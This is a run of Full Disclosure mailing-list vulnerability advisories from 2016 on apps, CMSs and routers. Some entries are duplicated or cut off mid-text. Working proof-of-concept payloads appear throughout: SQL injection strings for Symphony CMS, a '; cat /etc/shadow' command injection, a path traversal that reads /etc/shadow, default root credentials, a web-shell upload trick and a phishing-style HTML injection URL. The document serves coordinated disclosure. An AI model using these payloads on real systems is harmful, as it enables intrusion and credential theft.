[FD] Soso Transfer v1.1 iOS - Denial of Service Vulnerability

[Vulnerability Lab]

Document Title:
===
Soso Transfer v1.1 iOS - Denial of Service Vulnerability


References (Source):

http://www.vulnerability-lab.com/get_content.php?id=1703


Release Date:
=
2016-02-02


Vulnerability Laboratory ID (VL-ID):

1703


Common Vulnerability Scoring System:

3


Product & Service Introduction:
===
Soso Transfer is the easiest and fastest way to transfer photos (videos) from 
Camera Roll to computer or other iOS devices, and vice versa. 
No need for USB cable, iTunes or extra equipment! “Simple but powerful! No even 
a redundant step, it just lets you do what you want to do, 
a highly-recommended transfer app!

(Copy of the Homepage: 
https://itunes.apple.com/us/app/soso-transfer-wireless-backup/id1000466165 )



Abstract Advisory Information:
==
The Vulnerability Laboratory Core Research Team discovered a remote denial of 
service vulnerability in the official Soso Transfer mobile iOS web-application.


Vulnerability Disclosure Timeline:
==
2016-02-02: Public Disclosure (Vulnerability Laboratory)


Discovery Status:
=
Published


Affected Product(s):

Elite Tracy
Product: Soso Transfer - iOS (Web-Application) 1.1


Exploitation Technique:
===
Remote


Severity Level:
===
Medium


Technical Details & Description:

A remote denial of service web vulnerability has been discovered in the 
official Soso Transfer mobile iOS web-application.
The web vulnerability allows remote attackers to crash or to shutdown the 
application by include of invalid values.

The vulnerability is located in the `path` value of the `show id` module. 
Remote attackers are able to request the show path with invalid ids. 
Thus results in a permanent shutdown of the mobile iOS web-application. The 
attacker injects only a low amount of invalid values to the path location 
to crash the mobile web-application permanently. The request method to attack 
is GET and the attack vector of the issue is located on the client-side 
of the application. The issue is a classic denial of service issue that is 
exploited by an invalid value context as an application parameter.

The security risk of the denial of service vulnerability is estimated as medium 
with a cvss (common vulnerability scoring system) count of 3.0. 
Exploitation of the denial of service web vulnerability requires no user 
interaction or privileged web-application user account. 
Successful exploitation of the application web vulnerability results in 
permanent application crashs or stable shutdowns.

Request Method(s):
[+] GET

Vulnerable Module(s):
[+] ./show/

Vulnerable Parameter(s):
[+] path as id


Proof of Concept (PoC):
===
The denial of service web vulnerability can be exploited by remote attackers in 
the local wifi network without privileged user account or user interaction.
For security demonstration or to reproduce the vulnerability follow the 
provided information and steps below to continue.

--- PoC Session Logs [GET] ---
Status: 200[OK] 
GET http://localhost:3030/show/-1 Load Flags[LOAD_DOCUMENT_URI  
LOAD_INITIAL_DOCUMENT_URI  ] Größe des Inhalts[unknown] Mime Type[unknown]
   Request Header:
  Host[localhost:3030]
  User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:43.0) Gecko/20100101 
Firefox/43.0]
  Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
  Accept-Language[de,en-US;q=0.7,en;q=0.3]
  Accept-Encoding[gzip, deflate]
  DNT[1]
-
Status: 200[OK] 
GET http://localhost:3030/show/- Load Flags[LOAD_DOCUMENT_URI  
LOAD_INITIAL_DOCUMENT_URI  ] Größe des Inhalts[unknown] Mime Type[unknown]
   Request Header:
  Host[localhost:3030]
  User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:43.0) Gecko/20100101 
Firefox/43.0]
  Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
  Accept-Language[de,en-US;q=0.7,en;q=0.3]
  Accept-Encoding[gzip, deflate]
  DNT[1]

Reference(s):
http://localhost:3030/show/


Solution - Fix & Patch:
===
The vulnerability can be patched by a secure restriction of the show modules 
path id value. 
Disallow invalid values and use an own exception-handling to prevent denial of 
service issues via client-side GET parameter requests.


Security Risk:
==
The security risk of the denial of service web vulnerability in the wifi 
web-server interface application is estimated as medium. (CVSS 3.0)


Credits & Authors:
==
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri 
(resea...@vulnerability-lab.com) [www.vulnerability-lab.com]


Disclaimer & Information:

[FD] Getdpd Bug Bounty #1 - (asm0option0) Persistent Web Vulnerability

[Vulnerability Lab]

Document Title:
===
Getdpd Bug Bounty #1 - (asm0option0) Persistent Web Vulnerability


References (Source):

http://www.vulnerability-lab.com/get_content.php?id=1464

ID:  #14770


Release Date:
=
2016-02-02


Vulnerability Laboratory ID (VL-ID):

1564


Common Vulnerability Scoring System:

3.6


Product & Service Introduction:
===
DPD is an all-in-one shopping cart and digital fulfillment service for 
downloadable products. Serving thousands of stores, DPD processes and 
delivers millions worth of downloads each year.

(Copy of the Vendor Homepage: https://getdpd.com/security )


Abstract Advisory Information:
==
The Vulnerability Laboratory Research team discovered an application-side input 
validation web vulnerability in the official Getpdp online service 
web-application.


Vulnerability Disclosure Timeline:
==
2015-08-06: Researcher Notification & Coordination (Hadji Samir - Evolution 
Security GmbH)
2015-08-07: Vendor Notification (DPD Security Team - Bug Bounty Program)
2015-09-02: Vendor Response/Feedback (DPD Security Team - Bug Bounty Program)
2016-01-07: Vendor Fix/Patch (DPD Developer Team)
2016-02-02: Public Disclosure (Vulnerability Laboratory)


Discovery Status:
=
Published


Affected Product(s):

DPD - Digital Product Delivery
Product: DPD Online Service (Web-Application) 2015 Q3


Exploitation Technique:
===
Remote


Severity Level:
===
Medium


Technical Details & Description:

An application-side cross site scripting web vulnerability has been discovered 
in the official Getdpd online service web-application.
The security vulnerability allows remote attackers to inject own script code to 
the application-side of the affected application module.

The vulnerability is located in the input value id asm0option0 of the 
Button/Link creator module. Remote attackers with low privilege 
web-application user accounts are able to inject own malicious script code via 
POST method request. The injection point is the vulnerable 
id parameter with the title input and the execution point is located in 
storefront/productchooser?method=cart module. The request method 
to inject is POST and the vulnerability is located to the application-side of 
the vulnerable service.

The security risk of the application-side cross site vulnerability is estimated 
as medium with a cvss (common vulnerability scoring system) count of 3.9. 
Exploitation of the persistent input validation web vulnerability requires a 
low privilege web-application user account and low or medium user interaction. 
Successful exploitation of the vulnerability results in session hijacking, 
persistent phishing attacks, persistent external redirects to malicious source 
and persistent manipulation of affected or connected application modules.

Request Method(s):
[+] POST

Vulnerable Service(s):
[+] getdpd.com

Vulnerable Module(s):
[+] Button/Link creator

Vulnerable Parameter(s):
[+] 
storefront/productchooser?method=cart  (asm0option0)


Proof of Concept (PoC):
===
The security vulnerability can be exploited by remote attackers with low 
privilege web-application user account and low or medium user interaction.
For security demonstration or to reproduce the vulnerability follow the 
provided information and steps below to continue.

Manual steps to reproduce the vulnerability ...
1. Create new product with payload code( injection code)
2. Click to creat Button/link creator  (https://getdpd.com/storefront/deploy)
3. Click Product Chooser 
(https://getdpd.com/storefront/productchooser?method=cart)
4. Product Chooser 
5. The payload code will execute!


PoC: Source

  Product Chooser
  Add products to your chooser using the 
pulldown on the left. Once added to the display below, sort them as you like by 
dragging and dropping. Click on a button to use it. Click on it again to remove 
it.  When you don't use a button, selecting from your chooser will 
automatically send you to the cart (or buy now).  Once you have it the way you 
like, copy the code and paste it on your site.
  

  
  undefinedhttps://getdpd.com/v2/cart/add/23787/114595/121094`` 
rel=``asm0option0`` class=>``> ($1.00)https://getdpd.com/v2/cart/add/23787/114625/121125`` 
rel=``asm0option1`` class=``asmOptionDisabled`` disabled=``disabled``>``> 
($1.00)Added: ``> 
($1.00)``> 

[FD] File Manager PRO v1.3 iOS - Multiple Web Vulnerabilities

[Vulnerability Lab]

Document Title:
===
File Manager PRO v1.3 iOS - Multiple Web Vulnerabilities


References (Source):

http://www.vulnerability-lab.com/get_content.php?id=1704


Release Date:
=
2016-02-03


Vulnerability Laboratory ID (VL-ID):

1704


Common Vulnerability Scoring System:

7.3


Product & Service Introduction:
===
Super Easy File Management with File Manager Pro. A must-have for your Device & 
Even More!! so Just download it, you`ll wonder how you lived without it.
Add Photos & Videos from Library or directly Capture from Camera. Share Files 
via Wifi, E-mail, Dropbox & More.

(Copy of the Homepage: 
https://itunes.apple.com/us/app/file-manager-pro/id639528119 )


Abstract Advisory Information:
==
The Vulnerability Laboratory Core Research Team discovered multiple 
vulnerability in the official File Manager PRO iOS mobile web-application.


Vulnerability Disclosure Timeline:
==
2016-02-03: Public Disclosure (Vulnerability Laboratory)


Discovery Status:
=
Published


Affected Product(s):

RTC Hubs Limited
Product: File Manager PRO - iOS (Web-Application) 1.3


Exploitation Technique:
===
Remote


Severity Level:
===
High


Technical Details & Description:

1.1
A local file include web vulnerability has been discovered in the official File 
Manager PRO iOS mobile web-application.
The file include vulnerability allows remote attackers to unauthorized include 
local file/path requests to compromise the mobile web-application.

The web vulnerability is located in the `filename` value of the `Upload File` 
module. Attackers are able to inject own files with malicious 
`filename` values in the `upload` POST method request to compromise the mobile 
web-application. The local file/path include execution occcurs in 
the index file dir listing and sub folders of the wifi interface. The attacker 
is able to inject the local file include requests by usage of the 
`wifi interface` in connection with the vulnerable file upload POST method 
request. Injects are also possible via local app file sync function. 
Local attackers are also able to exploit the filename issue in combination with 
persistent injected script code to execute different malicious 
attack requests.

The security risk of the local file include vulnerability is estimated as high 
with a cvss (common vulnerability scoring system) count of 7.1. 
Exploitation of the local file include web vulnerability requires no user 
interaction or privileged web-application user account. 
Successful exploitation of the local file include vulnerability results in 
mobile application compromise or connected device component compromise.

Request Method(s):
[+] [POST]

Vulnerable Module(s):
[+] Upload File

Vulnerable Parameter(s):
[+] filename

Affected Module(s):
[+] Index File Dir Listing 
(http://localhost:56963/)


1.2
An arbitrary file upload web vulnerability has been discovered in the official 
File Manager PRO iOS mobile web-application.
The arbitrary file upload issue allows remote attackers to upload files with 
multiple extensions to bypass the web-server or system validation.

The vulnerability is located in the `Upload File` module. Remote attackers are 
able to upload a php or js web-shells by renaming the file with 
multiple extensions to bypass the file restriction mechanism. The attacker 
uploads for example a web-shell with the following name and extension 
`image.jpg.gif.js.php.jpg`. After the upload the attacker needs to open the 
file in the web application. He deletes the .jpg & . gif file 
extension and can access the application file with elevated access rights. 

The security risk of the arbitrary file upload web vulnerability is estimated 
as high with a cvss (common vulnerability scoring system) count of 7.3.
Exploitation of the arbitrary file upload web vulnerability requires no user 
interaction or privileged web-application user account with password.
Successful exploitation of the vulnerability results in unauthorized file and 
device access because of a compromise after the upload of web-shells.


Request Method(s):
[+] [POST]

Vulnerable Module(s):
[+] Upload File

Vulnerable Parameter(s):
[+] filename (multiple extensions)

Affected Module(s):
[+] Index File Dir Listing 
(http://localhost:56963/)


Proof of Concept (PoC):
===
1.1
The local file include web vulnerability can be exploited by remote attackers 
without privileged web-application user account or user 

[FD] Compal ConnectBox Wireless - Passphrase Settings Filter Bypass Vulnerability

[Vulnerability Lab]

Document Title:
===
Compal ConnectBox Wireless - Passphrase Settings Filter Bypass Vulnerability


References (Source):

http://www.vulnerability-lab.com/get_content.php?id=1705


Release Date:
=
2016-02-03


Vulnerability Laboratory ID (VL-ID):

1705


Common Vulnerability Scoring System:

5.8


Product & Service Introduction:
===
Wireless modem CBN CH7465LG is the world`s most compact voice modem. EuroDOCSIS 
3.0 in the stylish and elegant design suitable for home, 
home office or smaller businesses. It can be used in households with one or 
more computers with support. Wireless remote access to a wireless modem.

(Copy of the Homepage: https://infotomb.com/truac.pdf )


Abstract Advisory Information:
==
The Vulnerability Laboratory Core Research Team discovered a filter bypass web 
vulnerability in the official  Compal Wireless ConnectBox web-application.


Vulnerability Disclosure Timeline:
==
2016-02-03: Public Disclosure (Vulnerability Laboratory)


Discovery Status:
=
Published


Affected Product(s):

Compal
Product: ConnectBox - (Wireless) 4.01 - H7465LG-NCIP-4.50.18.15-1-NOSH


Exploitation Technique:
===
Remote


Severity Level:
===
High


Technical Details & Description:

A filter bypass web vulnerability has been discovered in the official Compal 
Wireless ConnectBox web-application.
The filter bypass web vulnerability allows an attacker to evade the controls of 
a restriction- or protection mechanism.

The issue allows an attacker to change the wireless passphrase to an insecure 
passphrase which is forbidden by the applications 
javascript engine. The vulnerability affects the `ConnectBox` manufactured by 
Compal for the local small ISP - Unitymedia. 
They are offering high-speed internet access over Cable (TV).

To bypass the filter you only need to replay the POST which changes the 
wireless passphrase and change the parameters `wlPSkey2g` 
and `wlPSkey5g`. The filter won`t allow you to set a passphrase without 
specialchars or uppercase/lowercase letters. By bypassing 
the filter you can set any passphrase (wpa needs at least 8 chars).

The security risk of the filter bypass vulnerability is estimated as medium and 
the cvss (common vulnerability scoring system) count is 5.8. 
Exploitation of the filter bypass vulnerability requires a privileged 
web-application user account with privileged access and medium user 
interaction. 
Successful exploitation of the vulnerability results in unauthorized access by 
setting a low secured passphrase key for wpa and wpa2.

Model:  CH7465LG-LC 
Hardware Version4.01
Software VersionCH7465LG-NCIP-4.50.18.15-1-NOSH


Proof of Concept (PoC):
===
The vulnerability can be exploited by remote attackers in the local networka 
with privileged web-application user account or privileged access and medium 
user interaction.
For security demonstration or to reproduce the vulnerability follow the 
provided information or steps below to continue.

--- PoC Session Logs [POST] ---
Status: 200[Ok]
POST http://localhost/xml/setter.xml 
Load Flags[LOAD_BACKGROUND  LOAD_BYPASS_LOCAL_CACHE_IF_BUSY ] Größe des 
Inhalts[-1] Mime Type[text/xml]
Request Header:
  Host[localhost]
  User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:44.0) Gecko/20100101 
Firefox/44.0]
  Accept[text/plain, */*; q=0.01]
  Accept-Language[de,en-US;q=0.7,en;q=0.3]
  Accept-Encoding[gzip, deflate]
  DNT[1]
  Content-Type[application/x-www-form-urlencoded; charset=UTF-8]
  X-Requested-With[XMLHttpRequest]
  Referer[http://192.168.0.1/index.html]
  Content-Length[196]
  Cookie[SID=3524502016]
  Connection[keep-alive]
POST-Daten:
  token[3753771008]
  fun[318]
  wlBandMode2g[1]
  wlBandMode5g[1]
  wlSsid2g[0xdeadbeef]
  wlSsid5g[0xdeadbeef]
  wlPSkey2g[<[CHANGE RIGHT HERE]>]
  wlPSkey5g[<[CHANGE RIGHT HERE]>]
  wlSecurity2g[8]
  wlSecurity5g[8]
  wlWpaalg2g[3]
  wlWpaalg5g[3]
Response Header:
  Server[NET-DK/1.0]
  Date[Tue, 02 Feb 2016 14:12:02 GMT]
  Last-Modified[Mon, 12 Oct 2015 11:00:12 GMT]
  Pragma[no-cache]
  Expires[-1]
  Content-Type[text/xml]
  Connection[close]


Security Risk:
==
The security risk of the filter bypass web vulnerability in the web-application 
of the hardware models is estimated as medium. (CVSS 5.8)


Credits & Authors:
==
Vulnerability Laboratory [Research Team] - Marco Onorati


Disclaimer & Information:
=
The information provided in this advisory is provided as it is without any 
warranty. Vulnerability Lab disclaims all warranties, either 

[FD] Soso Transfer v1.1 iOS - Denial of Service Vulnerability

[Vulnerability Lab]

Document Title:
===
Soso Transfer v1.1 iOS - Denial of Service Vulnerability


References (Source):

http://www.vulnerability-lab.com/get_content.php?id=1703


Release Date:
=
2016-02-02


Vulnerability Laboratory ID (VL-ID):

1703


Common Vulnerability Scoring System:

3


Product & Service Introduction:
===
Soso Transfer is the easiest and fastest way to transfer photos (videos) from 
Camera Roll to computer or other iOS devices, and vice versa. 
No need for USB cable, iTunes or extra equipment! “Simple but powerful! No even 
a redundant step, it just lets you do what you want to do, 
a highly-recommended transfer app!

(Copy of the Homepage: 
https://itunes.apple.com/us/app/soso-transfer-wireless-backup/id1000466165 )



Abstract Advisory Information:
==
The Vulnerability Laboratory Core Research Team discovered a remote denial of 
service vulnerability in the official Soso Transfer mobile iOS web-application.


Vulnerability Disclosure Timeline:
==
2016-02-02: Public Disclosure (Vulnerability Laboratory)


Discovery Status:
=
Published


Affected Product(s):

Elite Tracy
Product: Soso Transfer - iOS (Web-Application) 1.1


Exploitation Technique:
===
Remote


Severity Level:
===
Medium


Technical Details & Description:

A remote denial of service web vulnerability has been discovered in the 
official Soso Transfer mobile iOS web-application.
The web vulnerability allows remote attackers to crash or to shutdown the 
application by include of invalid values.

The vulnerability is located in the `path` value of the `show id` module. 
Remote attackers are able to request the show path with invalid ids. 
Thus results in a permanent shutdown of the mobile iOS web-application. The 
attacker injects only a low amount of invalid values to the path location 
to crash the mobile web-application permanently. The request method to attack 
is GET and the attack vector of the issue is located on the client-side 
of the application. The issue is a classic denial of service issue that is 
exploited by an invalid value context as an application parameter.

The security risk of the denial of service vulnerability is estimated as medium 
with a cvss (common vulnerability scoring system) count of 3.0. 
Exploitation of the denial of service web vulnerability requires no user 
interaction or privileged web-application user account. 
Successful exploitation of the application web vulnerability results in 
permanent application crashs or stable shutdowns.

Request Method(s):
[+] GET

Vulnerable Module(s):
[+] ./show/

Vulnerable Parameter(s):
[+] path as id


Proof of Concept (PoC):
===
The denial of service web vulnerability can be exploited by remote attackers in 
the local wifi network without privileged user account or user interaction.
For security demonstration or to reproduce the vulnerability follow the 
provided information and steps below to continue.

--- PoC Session Logs [GET] ---
Status: 200[OK] 
GET http://localhost:3030/show/-1' Load Flags[LOAD_DOCUMENT_URI  
LOAD_INITIAL_DOCUMENT_URI  ] Größe des Inhalts[unknown] Mime Type[unknown]
   Request Header:
  Host[localhost:3030]
  User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:43.0) Gecko/20100101 
Firefox/43.0]
  Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
  Accept-Language[de,en-US;q=0.7,en;q=0.3]
  Accept-Encoding[gzip, deflate]
  DNT[1]
-
Status: 200[OK] 
GET http://localhost:3030/show/- Load Flags[LOAD_DOCUMENT_URI  
LOAD_INITIAL_DOCUMENT_URI  ] Größe des Inhalts[unknown] Mime Type[unknown]
   Request Header:
  Host[localhost:3030]
  User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:43.0) Gecko/20100101 
Firefox/43.0]
  Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
  Accept-Language[de,en-US;q=0.7,en;q=0.3]
  Accept-Encoding[gzip, deflate]
  DNT[1]

Reference(s):
http://localhost:3030/show/


Solution - Fix & Patch:
===
The vulnerability can be patched by a secure restriction of the show modules 
path id value. 
Disallow invalid values and use an own exception-handling to prevent denial of 
service issues via client-side GET parameter requests.


Security Risk:
==
The security risk of the denial of service web vulnerability in the wifi 
web-server interface application is estimated as medium. (CVSS 3.0)


Credits & Authors:
==
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri 
(resea...@vulnerability-lab.com) [www.vulnerability-lab.com]


Disclaimer & Information:

[FD] Symphony CMS 2.6.3 – Multiple SQL Injection Vulnerabilities

[Sachin Wagh]

Symphony CMS 2.6.3 – Multiple SQL Injection Vulnerabilities


Information

Vulnerability Type : Multiple SQL Injection Vulnerabilities
Vendor Homepage: http://www.getsymphony.com/
Vulnerable Version:Symphony CMS 2.6.3
Fixed Version :Symphony CMS 2.6.5
Severity: High
Author – Sachin Wagh (@tiger_tigerboy)

Description


The vulnerability is located in the 'fields[username]','action[save]' and
'fields[email]' of the '/symphony/system/authors/new/' page.

Proof of Concept

*1. fields[username] (POST)*

Parameter: fields[username] (POST)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
Payload:
xsrf=tsQYrHSsj7iDQFfZcfAcBMiWImQ[first_name]=sachin[last_name]=sachin[email]=sachin[username]=-6697'
OR 7462=7462#[user_type]=author[password]=sach
in[password-confirmation]=sachin[auth_token_active]=no[default_area]=3[save]=Create
Author

Type: error-based
Title: MySQL OR error-based - WHERE or HAVING clause
Payload:
xsrf=tsQYrHSsj7iDQFfZcfAcBMiWImQ[first_name]=sachin[last_name]=sachin[email]=sachin[username]=-8105'
OR 1 GROUP BY CONCAT(0x71767a7871,(SELECT (CASE WHEN (1004=1
004) THEN 1 ELSE 0 END)),0x716b7a6271,FLOOR(RAND(0)*2)) HAVING
MIN(0)#[user_type]=author[password]=sachin[password-confirmation]=sachin[auth_token_active]=no[default_a
rea]=3[save]=Create Author

Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 OR time-based blind (comment)
Payload:
xsrf=tsQYrHSsj7iDQFfZcfAcBMiWImQ[first_name]=sachin[last_name]=sachin[email]=sachin[username]=sachin123'
OR SLEEP(5)#[user_type]=author[password]=s
achin[password-confirmation]=sachin[auth_token_active]=no[default_area]=3[save]=Create
Author
---
[14:09:41] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: Apache 2.4.12, PHP 5.5.27
back-end DBMS: MySQL 5.0.12

*2. fields[email] (POST)*

Parameter: fields[email] (POST)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload:
xsrf=tsQYrHSsj7iDQFfZcfAcBMiWImQ[first_name]=sachin[last_name]=sachin[email]=
sachi...@mail.com' AND 4852=4852 AND
'dqXl'='dqXl[username]=sachinnn123[user
type]=author[password]=sachin[password-confirmation]=sachin[auth_token_active]=no[default_area]=3[save]=Create
Author

Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP
BY clause
Payload:
xsrf=tsQYrHSsj7iDQFfZcfAcBMiWImQ[first_name]=sachin[last_name]=sachin[email]=
sachi...@mail.com' AND (SELECT 8298 FROM(SELECT
COUNT(*),CONCAT(0x71767a7871,(SELECT (ELT(
298=8298,1))),0x716b7a6271,FLOOR(RAND(0)*2))x FROM
INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND
'Pmvq'='Pmvq[username]=sachinnn123[user_type]=author[password]=sachin[
assword-confirmation]=sachin[auth_token_active]=no[default_area]=3[save]=Create
Author

Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload:
xsrf=tsQYrHSsj7iDQFfZcfAcBMiWImQ[first_name]=sachin[last_name]=sachin[email]=
sachi...@mail.com' AND (SELECT * FROM (SELECT(SLEEP(5)))xIxY) AND
'hKvH'='hKvH[user
ame]=sachinnn123[user_type]=author[password]=sachin[password-confirmation]=sachin[auth_token_active]=no[default_area]=3[save]=Create
Author

*3. action[save] (POST)*

Parameter: action[save] (POST)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload:
xsrf=tsQYrHSsj7iDQFfZcfAcBMiWImQ[first_name]=sachin[last_name]=sachin[email]=
sachi...@mail.com
[username]=sachinnn123[user_type]=author[password]=sa
chin[password-confirmation]=sachin[auth_token_active]=no[default_area]=3[save]=Create
Author%' AND 8836=8836 AND '%'='

---
[12:23:44] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: Apache 2.4.12, PHP 5.5.27
back-end DBMS: MySQL 5.0

Vulnerable Product:
   [+]
 Symphony CMS 2.6.3

Vulnerable Parameter(s):

[+]fields[username] (POST)
[+]fields[email] (POST)
[+]action[save] (POST)

Affected Area(s):
[+]
http://localhost/symphony2.6.3/symphony-2.6.3/symphony/system/authors/new/


Disclosure Timeline:

Vendor notification: Jan 29, 2016
Public disclosure: Jan 30, 2016
Credits & Authors

Sachin Wagh (@tiger_tigerboy)


-- 
Best Regards,

*Sachin Wagh*

___
Sent through the Full Disclosure mailing list

[FD] OpenXchange | Information Disclosure

[t . schughart]

Hi@all,

there is an information disclosure in OpenXchange (prior 7.8).
An authenticated user can enumerate all imap user folders. If you browse 
the PoC you get an permission denied error, but the folder’s name is 
reflected into the page in json format.


About Open Xchange:
Open-Xchange[2] develops, markets and sells web-based communication, 
collaboration and office productivity software, which enables full 
integration of email, documents, scheduling and social media


Risk-Rating: Very low

PoC:
https://ox.com/appsuite/api/tasks?action=all=10>=6%2C20%2C200%2C202%2C203%2C221%2C300%2C309=202=asc=UTC=

You have to paste your valid session. The Vulnerable parameter is 
folder. It requires an integer.


The vendor has been informed and fixed the Bug in newest Version.

Best regards

Tim Schughart
IT Security engineer

ProSec Networks
Website: https://www.prosec-networks.com
E-Mail: i...@prosec.networks.com
Phone: +49(0) 2621 9469 252

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

[FD] Equibase.com HTML Injection/Possible Reflected XSS

[Russell Butturini]

Vulnerability Type:
HTML Injection (Possible XSS)

Title:
Equibase.com HTML Injection

Site Description:

Equibase.com is the official source for horse racing results, mobile
racing data, statistics as well as all other horse racing and
thoroughbred racing information.


Details:

The page http://www.equibase.com/profiles/results.cfm has a parameter
called type (e.g.
http://www.equibase.com/profiles/Results.cfm?type=Horse) that has a
limited set of valid values.  The input for this parameter is render
unmodified in the output. This allows for reflected HTML injection and
content spoofing such as:

http://www.equibase.com/profiles/Results.cfm?type=%3Ch1%3E%3Cb%3EAn%20error%20occured.%20%20Please%20visit%20www.badguysite.com%20and%20log%20in%20to%20your%20equibase%20account%20to%20continue.%3C/b%3E%3C/h1%3E


Various other HTML tags were accepted and rendered.  Some limited
filtering did appear to be in place for XSS mitigation, as basic XSS
attacks did not work.  Since this was not a sanctioned test by the
site owner, extensive reflected XSS testing in this parameter was not
tested but based on observation the filtering in place did not appear
to be sufficient to stop an advanced reflected XSS attack.

Vulnerability Severity:  Medium

Vendor Interaction:

Vendor notified on 1/17 with full report. No response received.

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

[FD] GE Industrial Solutions - UPS SNMP Adapter Command Injection and Clear-text Sensitive Info Vulnerabilities

[Karn Ganeshen]

GE Industrial Solutions - UPS SNMP Adapter Command Injection and Clear-text
Storage of Sensitive Information Vulnerabilities

*Timelines:*
Reported to ICS-CERT on: July 06, 2015
Fix & Advisory Released by GE: January 25, 2015
Vulnerability ID: GEIS16-01

*GE Advisory: *
http://apps.geindustrial.com/publibrary/checkout/GEIS_SNMP?TNR=Application%20and%20Technical|GEIS_SNMP|PDF=GEIS_SNMP.pdf



*ICS-CERT Advisory:*In Progress

*About GE*

GE is a US-based company that maintains offices in several countries around
the world.

The affected product, SNMP/Web Interface adapter, is a web server designed
to present information about the Uninterruptible Power Supply (UPS).
According to GE, the SNMP/Web Interface is deployed across several sectors
including Critical Manufacturing and Energy. GE estimates that these
products are used worldwide.

*Affected Products*

• All SNMP/Web Interface cards with firmware version prior to 4.8
manufactured by GE Industrial Solutions.

*CVE-IDs:*
CVE-2016-0861
CVE-2016-0862


*VULNERABILITY OVERVIEW*
A


*COMMAND INJECTIONCVE-2016-0861*
Device application services run as (root) privileged user, and does not
perform strict input validation. This allows an authenticated user to
execute any system commands on the system.

Vulnerable function:
http://IP/dig.asp 

Vulnerable parameter:
Hostname/IP address


*PoC:*
In the Hostname/IP address input, enter:
; cat /etc/shadow

Output
root::0:0:root:/root:/bin/sh
<...other system users...>
ge::101:0:gedeups7:/home/admin:/bin/sh
root123::102:0:gedeups2:/home/admin:/bin/sh

B


*CLEARTEXT STORAGE OF SENSITIVE INFORMATIONCVE-2016-0862*
File contains sensitive account information stored in cleartext. All users,
including non-admins, can view/access device's configuration, via Menu
option -> Save -> Settings.

The application stores all information in clear-text, including *all user
logins and clear-text passwords*.


+
I sent it out on Jan 29 but for some reason, it was not posted to FD. So
sending it again.
-- 
Best Regards,
Karn Ganeshen
ipositivesecurity.blogspot.in

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

[FD] DLink DVG­N5402SP Multiple Vulnerabilities

[Karn Ganeshen]

 DLink DVG­N5402SP File Path Traversal, Weak Credentials Management, and
Sensitive Info Leakage Vulnerabilities

*Timelines*
Reported to CERT + Vendor: August 2015
Dlink released beta release: Oct 23, 2015
New fix release: MD5 (GRNV6.1U23J-83-DL-R1B114-SG_Normal.EN.img) =
04fd8b901e9f297a4cdbea803a9a43cb
No public disclosure till date - Dlink waiting for Service providers to ask
for new release + CERT opted out


*Vulnerable Models, Firmware, Hardware versions*
DVG­N5402SP Web Management
Model Name : GPN2.4P21­C­CN
Firmware Version : W1000CN­00
Firmware Version :W1000CN­03
Firmware Version :W2000EN­00
Hardware Platform :ZS
Hardware Version :Gpn2.4P21­C_WIFI­V0.05

Device can be managed through three users:
1. super ­ full privileges
2. admin ­ full privileges
3. support ­ restricted user

*1. Path traversal*
Arbitrary files can be read off of the device file system. No
authentication is required to exploit this vulnerability.
*CVE-ID*: CVE-2015-7245

*HTTP Request *

POST /cgi­bin/webproc HTTP/1.1
Host: :8080
User­Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:39.0) Gecko/20100101
Firefox/39.0 Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept­Language: en­US,en;q=0.5
Accept­Encoding: gzip, deflate
Referer: http://:8080/cgi­bin/webproc
Cookie: sessionid=abcdefgh; language=en_us; sys_UserName=super
Connection: keep­alive
Content­Type: application/x­www­form­urlencoded
Content­Length: 223

getpage=html%2Findex.html&*errorpage*=../../../../../../../../../../../etc/shadow%3Amenu=setup%3Apage=connected%
­action=auth&%3Ausername=blah&%3Apassword=blah&%3Aaction=login&%3Asessionid=abcdefgh


*HTTP Response*

HTTP/1.0 200 OK
pstVal­>name:getpage; pstVal­>value:html/main.html
pstVal­>name:getpage; pstVal­>value:html/index.html
pstVal­>name:errorpage;
pstVal­>value:../../../../../../../../../../../etc/shadow
pstVal­>name:var:menu; pstVal­>value:setup
pstVal­>name:var:page; pstVal­>value:connected
pstVal­>name:var:subpage; pstVal­>value:­
pstVal­>name:obj­action; pstVal­>value:auth
pstVal­>name::username; pstVal­>value:super
pstVal­>name::password; pstVal­>value:super
pstVal­>name::action; pstVal­>value:login
pstVal­>name::sessionid; pstVal­>value:1ac5da6b
Connection: close
Content­type: text/html
Pragma: no­cache
Cache­Control: no­cache
set­cookie: sessionid=1ac5da6b; expires=Fri, 31­Dec­ 23:59:59 GMT;
path=/

#root::13796:0:9:7:::
root::13796:0:9:7:::
#tw::13796:0:9:7:::
#tw::13796:0:9:7:::


*2. Use of Default, Hard­Coded Credentials**CVE-ID*: CVE-2015-7246

The device has two system user accounts configured with default passwords
(root:root, tw:tw).
Login ­ tw ­ is not active though. Anyone could use the default password to
